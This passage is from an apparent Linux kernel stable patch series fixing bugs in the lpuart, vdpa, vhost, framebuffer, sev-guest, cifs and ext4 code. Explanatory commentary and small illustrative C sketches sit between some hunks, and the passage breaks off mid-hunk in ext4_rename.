+-	lpuart32_write(&sport->port, 0, UARTMODIR);
+-	lpuart32_wait_bit_set(&sport->port, UARTSTAT, UARTSTAT_TC);
++	/*
++	 * LPUART Transmission Complete Flag may never be set while queuing a break
++	 * character, so skip waiting for transmission complete when UARTCTRL_SBK is
++	 * asserted.
++	 */
++	if (!(old_ctrl & UARTCTRL_SBK)) {
++		lpuart32_write(&sport->port, 0, UARTMODIR);
++		lpuart32_wait_bit_set(&sport->port, UARTSTAT, UARTSTAT_TC);
++	}
+ 
+ 	/* disable transmit and receive */
+ 	lpuart32_write(&sport->port, old_ctrl & ~(UARTCTRL_TE | UARTCTRL_RE),
+diff --git a/drivers/vdpa/mlx5/core/mlx5_vdpa.h b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+index 058fbe28107e9..25fc4120b618d 100644
+--- a/drivers/vdpa/mlx5/core/mlx5_vdpa.h
++++ b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+@@ -96,6 +96,7 @@ struct mlx5_vdpa_dev {
+ 	struct mlx5_control_vq cvq;
+ 	struct workqueue_struct *wq;
+ 	unsigned int group2asid[MLX5_VDPA_NUMVQ_GROUPS];
++	bool suspended;
+ };
+ 
+ int mlx5_vdpa_alloc_pd(struct mlx5_vdpa_dev *dev, u32 *pdn, u16 uid);
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 3a6dbbc6440d4..daac3ab314785 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -2411,7 +2411,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
+ 	if (err)
+ 		goto err_mr;
+ 
+-	if (!(mvdev->status & VIRTIO_CONFIG_S_DRIVER_OK))
++	if (!(mvdev->status & VIRTIO_CONFIG_S_DRIVER_OK) || mvdev->suspended)
+ 		goto err_mr;
+ 
+ 	restore_channels_info(ndev);
+@@ -2579,6 +2579,7 @@ static int mlx5_vdpa_reset(struct vdpa_device *vdev)
+ 	clear_vqs_ready(ndev);
+ 	mlx5_vdpa_destroy_mr(&ndev->mvdev);
+ 	ndev->mvdev.status = 0;
++	ndev->mvdev.suspended = false;
+ 	ndev->cur_num_vqs = 0;
+ 	ndev->mvdev.cvq.received_desc = 0;
+ 	ndev->mvdev.cvq.completed_desc = 0;
+@@ -2815,6 +2816,8 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 	struct mlx5_vdpa_virtqueue *mvq;
+ 	int i;
+ 
++	mlx5_vdpa_info(mvdev, "suspending device\n");
++
+ 	down_write(&ndev->reslock);
+ 	ndev->nb_registered = false;
+ 	mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+@@ -2824,6 +2827,7 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 		suspend_vq(ndev, mvq);
+ 	}
+ 	mlx5_vdpa_cvq_suspend(mvdev);
++	mvdev->suspended = true;
+ 	up_write(&ndev->reslock);
+ 	return 0;
+ }
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim.c b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+index cb88891b44a8c..61bde476cf9c8 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+@@ -66,6 +66,7 @@ static void vdpasim_vq_notify(struct vringh *vring)
+ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ {
+ 	struct vdpasim_virtqueue *vq = &vdpasim->vqs[idx];
++	uint16_t last_avail_idx = vq->vring.last_avail_idx;
+ 
+ 	vringh_init_iotlb(&vq->vring, vdpasim->features, vq->num, false,
+ 			  (struct vring_desc *)(uintptr_t)vq->desc_addr,
+@@ -74,6 +75,18 @@ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ 			  (struct vring_used *)
+ 			  (uintptr_t)vq->device_addr);
+ 
++	vq->vring.last_avail_idx = last_avail_idx;
++
++	/*
++	 * Since vdpa_sim does not support receiving inflight descriptors as a
++	 * destination of a migration, let's set both avail_idx and used_idx
++	 * the same at vq start.  This is how vhost-user works in a
++	 * VHOST_SET_VRING_BASE call.
++	 *
++	 * Although the simple fix is to set last_used_idx at
++	 * vdpasim_set_vq_state, it would be reset at vdpasim_queue_ready.
++	 */
++	vq->vring.last_used_idx = last_avail_idx;
+ 	vq->vring.notify = vdpasim_vq_notify;
+ }
+ 
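
The vdpa_sim change saves last_avail_idx before vringh_init_iotlb() re-initializes the ring and restores it afterwards, also mirroring it into last_used_idx the way a VHOST_SET_VRING_BASE call would. A toy sketch of that save/reinit/restore pattern (the struct below is a stand-in, not the real vringh state):

/* Save/reinit/restore: re-initialising a structure must not clobber
 * state that has to survive across the reset. */
#include <stdio.h>
#include <string.h>

struct vring {
	unsigned short last_avail_idx;
	unsigned short last_used_idx;
	/* ... descriptor pointers etc. ... */
};

static void vring_reinit(struct vring *vr)
{
	memset(vr, 0, sizeof(*vr));	/* models vringh_init_iotlb() */
}

static void queue_ready(struct vring *vr)
{
	unsigned short last_avail_idx = vr->last_avail_idx;	/* save */

	vring_reinit(vr);

	vr->last_avail_idx = last_avail_idx;	/* restore */
	vr->last_used_idx = last_avail_idx;	/* start with both equal */
}

int main(void)
{
	struct vring vr = { .last_avail_idx = 42 };

	queue_ready(&vr);
	printf("avail=%u used=%u\n", vr.last_avail_idx, vr.last_used_idx);
	return 0;
}
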
+diff --git a/drivers/vdpa/virtio_pci/vp_vdpa.c b/drivers/vdpa/virtio_pci/vp_vdpa.c
+index 8fe267ca3e76f..281287fae89f1 100644
+--- a/drivers/vdpa/virtio_pci/vp_vdpa.c
++++ b/drivers/vdpa/virtio_pci/vp_vdpa.c
+@@ -645,8 +645,8 @@ static void vp_vdpa_remove(struct pci_dev *pdev)
+ 	struct virtio_pci_modern_device *mdev = NULL;
+ 
+ 	mdev = vp_vdpa_mgtdev->mdev;
+-	vp_modern_remove(mdev);
+ 	vdpa_mgmtdev_unregister(&vp_vdpa_mgtdev->mgtdev);
++	vp_modern_remove(mdev);
+ 	kfree(vp_vdpa_mgtdev->mgtdev.id_table);
+ 	kfree(mdev);
+ 	kfree(vp_vdpa_mgtdev);
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index ec32f785dfdec..b7657984dd8df 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -1134,6 +1134,7 @@ static int vhost_vdpa_alloc_domain(struct vhost_vdpa *v)
+ 
+ err_attach:
+ 	iommu_domain_free(v->domain);
++	v->domain = NULL;
+ 	return ret;
+ }
+ 
+@@ -1178,6 +1179,7 @@ static void vhost_vdpa_cleanup(struct vhost_vdpa *v)
+ 			vhost_vdpa_remove_as(v, asid);
+ 	}
+ 
++	vhost_vdpa_free_domain(v);
+ 	vhost_dev_cleanup(&v->vdev);
+ 	kfree(v->vdev.vqs);
+ }
+@@ -1250,7 +1252,6 @@ static int vhost_vdpa_release(struct inode *inode, struct file *filep)
+ 	vhost_vdpa_clean_irq(v);
+ 	vhost_vdpa_reset(v);
+ 	vhost_dev_stop(&v->vdev);
+-	vhost_vdpa_free_domain(v);
+ 	vhost_vdpa_config_put(v);
+ 	vhost_vdpa_cleanup(v);
+ 	mutex_unlock(&d->mutex);
+diff --git a/drivers/video/fbdev/chipsfb.c b/drivers/video/fbdev/chipsfb.c
+index f1c1c95c1fdf0..2ecb97c619b7c 100644
+--- a/drivers/video/fbdev/chipsfb.c
++++ b/drivers/video/fbdev/chipsfb.c
+@@ -358,16 +358,21 @@ static int chipsfb_pci_init(struct pci_dev *dp, const struct pci_device_id *ent)
+ 	if (rc)
+ 		return rc;
+ 
+-	if (pci_enable_device(dp) < 0) {
++	rc = pci_enable_device(dp);
++	if (rc < 0) {
+ 		dev_err(&dp->dev, "Cannot enable PCI device\n");
+ 		goto err_out;
+ 	}
+ 
+-	if ((dp->resource[0].flags & IORESOURCE_MEM) == 0)
++	if ((dp->resource[0].flags & IORESOURCE_MEM) == 0) {
++		rc = -ENODEV;
+ 		goto err_disable;
++	}
+ 	addr = pci_resource_start(dp, 0);
+-	if (addr == 0)
++	if (addr == 0) {
++		rc = -ENODEV;
+ 		goto err_disable;
++	}
+ 
+ 	p = framebuffer_alloc(0, &dp->dev);
+ 	if (p == NULL) {
+@@ -417,7 +422,8 @@ static int chipsfb_pci_init(struct pci_dev *dp, const struct pci_device_id *ent)
+ 
+ 	init_chips(p, addr);
+ 
+-	if (register_framebuffer(p) < 0) {
++	rc = register_framebuffer(p);
++	if (rc < 0) {
+ 		dev_err(&dp->dev,"C&T 65550 framebuffer failed to register\n");
+ 		goto err_unmap;
+ 	}
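
The chipsfb hunks capture each helper's return value in rc before jumping to the error labels, so the probe path propagates a real errno instead of whatever rc last held. A compact sketch of the idiom:

/* Error propagation in the style of the chipsfb fix: set rc before
 * jumping, so the error path returns the real cause rather than a
 * stale or unset value. */
#include <errno.h>
#include <stdio.h>

static int enable_device(void) { return 0; }
static int has_mem_resource(void) { return 0; }	/* pretend it is missing */

static int probe(void)
{
	int rc;

	rc = enable_device();
	if (rc < 0)
		goto err_out;

	if (!has_mem_resource()) {
		rc = -ENODEV;	/* the fix: set rc before the goto */
		goto err_disable;
	}

	return 0;

err_disable:
	/* undo enable_device() here */
err_out:
	return rc;
}

int main(void)
{
	printf("probe() = %d (-ENODEV is %d)\n", probe(), -ENODEV);
	return 0;
}
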
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index 583cbcf094467..a3cf1f764f29b 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -309,17 +309,18 @@ void fb_deferred_io_open(struct fb_info *info,
+ 			 struct inode *inode,
+ 			 struct file *file)
+ {
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
+ 	file->f_mapping->a_ops = &fb_deferred_io_aops;
++	fbdefio->open_count++;
+ }
+ EXPORT_SYMBOL_GPL(fb_deferred_io_open);
+ 
+-void fb_deferred_io_release(struct fb_info *info)
++static void fb_deferred_io_lastclose(struct fb_info *info)
+ {
+-	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 	struct page *page;
+ 	int i;
+ 
+-	BUG_ON(!fbdefio);
+ 	cancel_delayed_work_sync(&info->deferred_work);
+ 
+ 	/* clear out the mapping that we setup */
+@@ -328,13 +329,21 @@ void fb_deferred_io_release(struct fb_info *info)
+ 		page->mapping = NULL;
+ 	}
+ }
++
++void fb_deferred_io_release(struct fb_info *info)
++{
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
++	if (!--fbdefio->open_count)
++		fb_deferred_io_lastclose(info);
++}
+ EXPORT_SYMBOL_GPL(fb_deferred_io_release);
+ 
+ void fb_deferred_io_cleanup(struct fb_info *info)
+ {
+ 	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 
+-	fb_deferred_io_release(info);
++	fb_deferred_io_lastclose(info);
+ 
+ 	kvfree(info->pagerefs);
+ 	mutex_destroy(&fbdefio->lock);
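
With the new open_count field, fb_deferred_io_release() performs the heavy teardown (cancelling deferred work, clearing page mappings) only when the last opener goes away, while fb_deferred_io_cleanup() calls the lastclose helper directly. A hedged userspace sketch of the last-close pattern, with a pthread mutex standing in for the fb_info lock (build with -pthread):

/* Last-close teardown: open() bumps a count, release() tears down
 * only when the count hits zero. Names are illustrative. */
#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t info_lock = PTHREAD_MUTEX_INITIALIZER;
static int open_count;

static void lastclose(void)
{
	puts("cancelling deferred work, clearing page mappings");
}

static void defio_open(void)
{
	pthread_mutex_lock(&info_lock);
	open_count++;
	pthread_mutex_unlock(&info_lock);
}

static void defio_release(void)
{
	pthread_mutex_lock(&info_lock);
	if (!--open_count)
		lastclose();	/* only the final release tears down */
	pthread_mutex_unlock(&info_lock);
}

int main(void)
{
	defio_open();
	defio_open();
	defio_release();	/* no teardown yet */
	defio_release();	/* prints the teardown message */
	return 0;
}
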
+diff --git a/drivers/video/fbdev/stifb.c b/drivers/video/fbdev/stifb.c
+index 3feb6e40d56d8..ef8a4c5fc6875 100644
+--- a/drivers/video/fbdev/stifb.c
++++ b/drivers/video/fbdev/stifb.c
+@@ -921,6 +921,28 @@ SETUP_HCRX(struct stifb_info *fb)
+ 
+ /* ------------------- driver specific functions --------------------------- */
+ 
++static int
++stifb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
++{
++	struct stifb_info *fb = container_of(info, struct stifb_info, info);
++
++	if (var->xres != fb->info.var.xres ||
++	    var->yres != fb->info.var.yres ||
++	    var->bits_per_pixel != fb->info.var.bits_per_pixel)
++		return -EINVAL;
++
++	var->xres_virtual = var->xres;
++	var->yres_virtual = var->yres;
++	var->xoffset = 0;
++	var->yoffset = 0;
++	var->grayscale = fb->info.var.grayscale;
++	var->red.length = fb->info.var.red.length;
++	var->green.length = fb->info.var.green.length;
++	var->blue.length = fb->info.var.blue.length;
++
++	return 0;
++}
++
+ static int
+ stifb_setcolreg(u_int regno, u_int red, u_int green,
+ 	      u_int blue, u_int transp, struct fb_info *info)
+@@ -1145,6 +1167,7 @@ stifb_init_display(struct stifb_info *fb)
+ 
+ static const struct fb_ops stifb_ops = {
+ 	.owner		= THIS_MODULE,
++	.fb_check_var	= stifb_check_var,
+ 	.fb_setcolreg	= stifb_setcolreg,
+ 	.fb_blank	= stifb_blank,
+ 	.fb_fillrect	= stifb_fillrect,
+@@ -1164,6 +1187,7 @@ static int __init stifb_init_fb(struct sti_struct *sti, int bpp_pref)
+ 	struct stifb_info *fb;
+ 	struct fb_info *info;
+ 	unsigned long sti_rom_address;
++	char modestr[32];
+ 	char *dev_name;
+ 	int bpp, xres, yres;
+ 
+@@ -1342,6 +1366,9 @@ static int __init stifb_init_fb(struct sti_struct *sti, int bpp_pref)
+ 	info->flags = FBINFO_HWACCEL_COPYAREA | FBINFO_HWACCEL_FILLRECT;
+ 	info->pseudo_palette = &fb->pseudo_palette;
+ 
++	scnprintf(modestr, sizeof(modestr), "%dx%d-%d", xres, yres, bpp);
++	fb_find_mode(&info->var, info, modestr, NULL, 0, NULL, bpp);
++
+ 	/* This has to be done !!! */
+ 	if (fb_alloc_cmap(&info->cmap, NR_PALETTE, 0))
+ 		goto out_err1;
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 6de888bce1bb1..741d12f75726c 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -31,6 +31,9 @@
+ #define AAD_LEN		48
+ #define MSG_HDR_VER	1
+ 
++#define SNP_REQ_MAX_RETRY_DURATION	(60*HZ)
++#define SNP_REQ_RETRY_DELAY		(2*HZ)
++
+ struct snp_guest_crypto {
+ 	struct crypto_aead *tfm;
+ 	u8 *iv, *authtag;
+@@ -320,26 +323,14 @@ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8
+ 	return __enc_payload(snp_dev, req, payload, sz);
+ }
+ 
+-static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
+-				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
+-				u32 resp_sz, __u64 *fw_err)
++static int __handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, __u64 *fw_err)
+ {
+-	unsigned long err;
+-	u64 seqno;
++	unsigned long err = 0xff, override_err = 0;
++	unsigned long req_start = jiffies;
++	unsigned int override_npages = 0;
+ 	int rc;
+ 
+-	/* Get message sequence and verify that its a non-zero */
+-	seqno = snp_get_msg_seqno(snp_dev);
+-	if (!seqno)
+-		return -EIO;
+-
+-	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+-
+-	/* Encrypt the userspace provided payload */
+-	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
+-	if (rc)
+-		return rc;
+-
++retry_request:
+ 	/*
+ 	 * Call firmware to process the request. In this function the encrypted
+ 	 * message enters shared memory with the host. So after this call the
+@@ -347,18 +338,24 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	 * prevent reuse of the IV.
+ 	 */
+ 	rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++	switch (rc) {
++	case -ENOSPC:
++		/*
++		 * If the extended guest request fails due to having too
++		 * small of a certificate data buffer, retry the same
++		 * guest request without the extended data request in
++		 * order to increment the sequence number and thus avoid
++		 * IV reuse.
++		 */
++		override_npages = snp_dev->input.data_npages;
++		exit_code	= SVM_VMGEXIT_GUEST_REQUEST;
+ 
+-	/*
+-	 * If the extended guest request fails due to having too small of a
+-	 * certificate data buffer, retry the same guest request without the
+-	 * extended data request in order to increment the sequence number
+-	 * and thus avoid IV reuse.
+-	 */
+-	if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST &&
+-	    err == SNP_GUEST_REQ_INVALID_LEN) {
+-		const unsigned int certs_npages = snp_dev->input.data_npages;
+-
+-		exit_code = SVM_VMGEXIT_GUEST_REQUEST;
++		/*
++		 * Override the error to inform callers the given extended
++		 * request buffer size was too small and give the caller the
++		 * required buffer size.
++		 */
++		override_err	= SNP_GUEST_REQ_INVALID_LEN;
+ 
+ 		/*
+ 		 * If this call to the firmware succeeds, the sequence number can
+@@ -368,15 +365,20 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		 * of the VMPCK and the error code being propagated back to the
+ 		 * user as an ioctl() return code.
+ 		 */
+-		rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++		goto retry_request;
+ 
+-		/*
+-		 * Override the error to inform callers the given extended
+-		 * request buffer size was too small and give the caller the
+-		 * required buffer size.
+-		 */
+-		err = SNP_GUEST_REQ_INVALID_LEN;
+-		snp_dev->input.data_npages = certs_npages;
++	/*
++	 * The host may return SNP_GUEST_REQ_ERR_EBUSY if the request has been
++	 * throttled. Retry in the driver to avoid returning and reusing the
++	 * message sequence number on a different message.
++	 */
++	case -EAGAIN:
++		if (jiffies - req_start > SNP_REQ_MAX_RETRY_DURATION) {
++			rc = -ETIMEDOUT;
++			break;
++		}
++		schedule_timeout_killable(SNP_REQ_RETRY_DELAY);
++		goto retry_request;
+ 	}
+ 
+ 	/*
+@@ -388,7 +390,10 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	snp_inc_msg_seqno(snp_dev);
+ 
+ 	if (fw_err)
+-		*fw_err = err;
++		*fw_err = override_err ?: err;
++
++	if (override_npages)
++		snp_dev->input.data_npages = override_npages;
+ 
+ 	/*
+ 	 * If an extended guest request was issued and the supplied certificate
+@@ -396,29 +401,49 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	 * prevent IV reuse. If the standard request was successful, return -EIO
+ 	 * back to the caller as would have originally been returned.
+ 	 */
+-	if (!rc && err == SNP_GUEST_REQ_INVALID_LEN)
++	if (!rc && override_err == SNP_GUEST_REQ_INVALID_LEN)
++		return -EIO;
++
++	return rc;
++}
++
++static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
++				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
++				u32 resp_sz, __u64 *fw_err)
++{
++	u64 seqno;
++	int rc;
++
++	/* Get message sequence and verify that it is non-zero */
++	seqno = snp_get_msg_seqno(snp_dev);
++	if (!seqno)
+ 		return -EIO;
+ 
++	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
++
++	/* Encrypt the userspace provided payload */
++	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
++	if (rc)
++		return rc;
++
++	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
+ 	if (rc) {
+-		dev_alert(snp_dev->dev,
+-			  "Detected error from ASP request. rc: %d, fw_err: %llu\n",
+-			  rc, *fw_err);
+-		goto disable_vmpck;
++		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
++			return rc;
++
++		dev_alert(snp_dev->dev, "Detected error from ASP request. rc: %d, fw_err: %llu\n", rc, *fw_err);
++		snp_disable_vmpck(snp_dev);
++		return rc;
+ 	}
+ 
+ 	rc = verify_and_dec_payload(snp_dev, resp_buf, resp_sz);
+ 	if (rc) {
+-		dev_alert(snp_dev->dev,
+-			  "Detected unexpected decode failure from ASP. rc: %d\n",
+-			  rc);
+-		goto disable_vmpck;
++		dev_alert(snp_dev->dev, "Detected unexpected decode failure from ASP. rc: %d\n", rc);
++		snp_disable_vmpck(snp_dev);
++		return rc;
+ 	}
+ 
+ 	return 0;
+-
+-disable_vmpck:
+-	snp_disable_vmpck(snp_dev);
+-	return rc;
+ }
+ 
+ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+@@ -705,6 +730,9 @@ static int __init sev_guest_probe(struct platform_device *pdev)
+ 	void __iomem *mapping;
+ 	int ret;
+ 
++	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
++		return -ENODEV;
++
+ 	if (!dev->platform_data)
+ 		return -ENODEV;
+ 
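
The reworked __handle_guest_request() above retries throttled (-EAGAIN) requests every SNP_REQ_RETRY_DELAY until SNP_REQ_MAX_RETRY_DURATION elapses, then reports -ETIMEDOUT; retrying inside the driver keeps the message sequence number from being reused for a different message. A userspace sketch of the deadline-bounded retry loop, with wall-clock seconds standing in for jiffies and an issue_request() stub that is always throttled:

/* Deadline-bounded retry: retry a throttled request with a fixed
 * delay until an overall deadline expires. Durations are scaled
 * down from the kernel's 60*HZ / 2*HZ for the demo. */
#include <errno.h>
#include <stdio.h>
#include <time.h>
#include <unistd.h>

#define MAX_RETRY_SECONDS	6	/* kernel uses 60*HZ */
#define RETRY_DELAY_SECONDS	2	/* kernel uses 2*HZ */

static int issue_request(void) { return -EAGAIN; }	/* always throttled */

static int handle_request(void)
{
	time_t start = time(NULL);
	int rc;

retry:
	rc = issue_request();
	if (rc == -EAGAIN) {
		if (time(NULL) - start > MAX_RETRY_SECONDS)
			return -ETIMEDOUT;
		sleep(RETRY_DELAY_SECONDS);
		goto retry;
	}
	return rc;
}

int main(void)
{
	printf("handle_request() = %d (-ETIMEDOUT is %d)\n",
	       handle_request(), -ETIMEDOUT);
	return 0;
}
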
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 442718cf61b86..7a2862c10afbd 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -233,15 +233,32 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		size[0] = 8; /* sizeof __le64 */
+ 		data[0] = ptr;
+ 
+-		rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst], COMPOUND_FID,
+-					COMPOUND_FID, current->tgid,
+-					FILE_END_OF_FILE_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
++		if (cfile) {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						cfile->fid.persistent_fid,
++						cfile->fid.volatile_fid,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++		} else {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						COMPOUND_FID,
++						COMPOUND_FID,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
+ 		if (rc)
+ 			goto finished;
+-		smb2_set_next_command(tcon, &rqst[num_rqst]);
+-		smb2_set_related(&rqst[num_rqst++]);
++		num_rqst++;
+ 		trace_smb3_set_eof_enter(xid, ses->Suid, tcon->tid, full_path);
+ 		break;
+ 	case SMB2_OP_SET_INFO:
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+index 381babc1212c9..d827b7547ffad 100644
+--- a/fs/cifs/smb2transport.c
++++ b/fs/cifs/smb2transport.c
+@@ -425,7 +425,7 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 
+ 		/* safe to access primary channel, since it will never go away */
+ 		spin_lock(&ses->chan_lock);
+-		memcpy(ses->chans[0].signkey, ses->smb3signingkey,
++		memcpy(ses->chans[chan_index].signkey, ses->smb3signingkey,
+ 		       SMB3_SIGN_KEY_SIZE);
+ 		spin_unlock(&ses->chan_lock);
+ 
+diff --git a/fs/cifs/transport.c b/fs/cifs/transport.c
+index 3851d0aaa2886..c961b90f92b9f 100644
+--- a/fs/cifs/transport.c
++++ b/fs/cifs/transport.c
+@@ -297,7 +297,7 @@ static int
+ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 		struct smb_rqst *rqst)
+ {
+-	int rc = 0;
++	int rc;
+ 	struct kvec *iov;
+ 	int n_vec;
+ 	unsigned int send_length = 0;
+@@ -308,6 +308,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 	struct msghdr smb_msg = {};
+ 	__be32 rfc1002_marker;
+ 
++	cifs_in_send_inc(server);
+ 	if (cifs_rdma_enabled(server)) {
+ 		/* return -EAGAIN when connecting or reconnecting */
+ 		rc = -EAGAIN;
+@@ -316,14 +317,17 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 		goto smbd_done;
+ 	}
+ 
++	rc = -EAGAIN;
+ 	if (ssocket == NULL)
+-		return -EAGAIN;
++		goto out;
+ 
++	rc = -ERESTARTSYS;
+ 	if (fatal_signal_pending(current)) {
+ 		cifs_dbg(FYI, "signal pending before send request\n");
+-		return -ERESTARTSYS;
++		goto out;
+ 	}
+ 
++	rc = 0;
+ 	/* cork the socket */
+ 	tcp_sock_set_cork(ssocket->sk, true);
+ 
+@@ -434,7 +438,8 @@ smbd_done:
+ 			 rc);
+ 	else if (rc > 0)
+ 		rc = 0;
+-
++out:
++	cifs_in_send_dec(server);
+ 	return rc;
+ }
+ 
+@@ -853,9 +858,7 @@ cifs_call_async(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+ 	 * I/O response may come back and free the mid entry on another thread.
+ 	 */
+ 	cifs_save_when_sent(mid);
+-	cifs_in_send_inc(server);
+ 	rc = smb_send_rqst(server, 1, rqst, flags);
+-	cifs_in_send_dec(server);
+ 
+ 	if (rc < 0) {
+ 		revert_current_mid(server, mid->credits);
+@@ -1146,9 +1149,7 @@ compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+ 		else
+ 			midQ[i]->callback = cifs_compound_last_callback;
+ 	}
+-	cifs_in_send_inc(server);
+ 	rc = smb_send_rqst(server, num_rqst, rqst, flags);
+-	cifs_in_send_dec(server);
+ 
+ 	for (i = 0; i < num_rqst; i++)
+ 		cifs_save_when_sent(midQ[i]);
+@@ -1398,9 +1399,7 @@ SendReceive(const unsigned int xid, struct cifs_ses *ses,
+ 
+ 	midQ->mid_state = MID_REQUEST_SUBMITTED;
+ 
+-	cifs_in_send_inc(server);
+ 	rc = smb_send(server, in_buf, len);
+-	cifs_in_send_dec(server);
+ 	cifs_save_when_sent(midQ);
+ 
+ 	if (rc < 0)
+@@ -1541,9 +1540,7 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 	}
+ 
+ 	midQ->mid_state = MID_REQUEST_SUBMITTED;
+-	cifs_in_send_inc(server);
+ 	rc = smb_send(server, in_buf, len);
+-	cifs_in_send_dec(server);
+ 	cifs_save_when_sent(midQ);
+ 
+ 	if (rc < 0)
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 34c87fcfd0617..eea11ad84e680 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -4807,13 +4807,6 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 		goto bad_inode;
+ 	raw_inode = ext4_raw_inode(&iloc);
+ 
+-	if ((ino == EXT4_ROOT_INO) && (raw_inode->i_links_count == 0)) {
+-		ext4_error_inode(inode, function, line, 0,
+-				 "iget: root inode unallocated");
+-		ret = -EFSCORRUPTED;
+-		goto bad_inode;
+-	}
+-
+ 	if ((flags & EXT4_IGET_HANDLE) &&
+ 	    (raw_inode->i_links_count == 0) && (raw_inode->i_mode == 0)) {
+ 		ret = -ESTALE;
+@@ -4886,11 +4879,16 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	 * NeilBrown 1999oct15
+ 	 */
+ 	if (inode->i_nlink == 0) {
+-		if ((inode->i_mode == 0 ||
++		if ((inode->i_mode == 0 || flags & EXT4_IGET_SPECIAL ||
+ 		     !(EXT4_SB(inode->i_sb)->s_mount_state & EXT4_ORPHAN_FS)) &&
+ 		    ino != EXT4_BOOT_LOADER_INO) {
+-			/* this inode is deleted */
+-			ret = -ESTALE;
++			/* this inode is deleted or unallocated */
++			if (flags & EXT4_IGET_SPECIAL) {
++				ext4_error_inode(inode, function, line, 0,
++						 "iget: special inode unallocated");
++				ret = -EFSCORRUPTED;
++			} else
++				ret = -ESTALE;
+ 			goto bad_inode;
+ 		}
+ 		/* The only unlinked inodes we let through here have
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 800d631c920b4..56f09598448b4 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -3884,10 +3884,8 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 				goto end_rename;
+ 		}
+ 		retval = ext4_rename_dir_prepare(handle, &old);
+-		if (retval) {
+-			inode_unlock(old.inode);
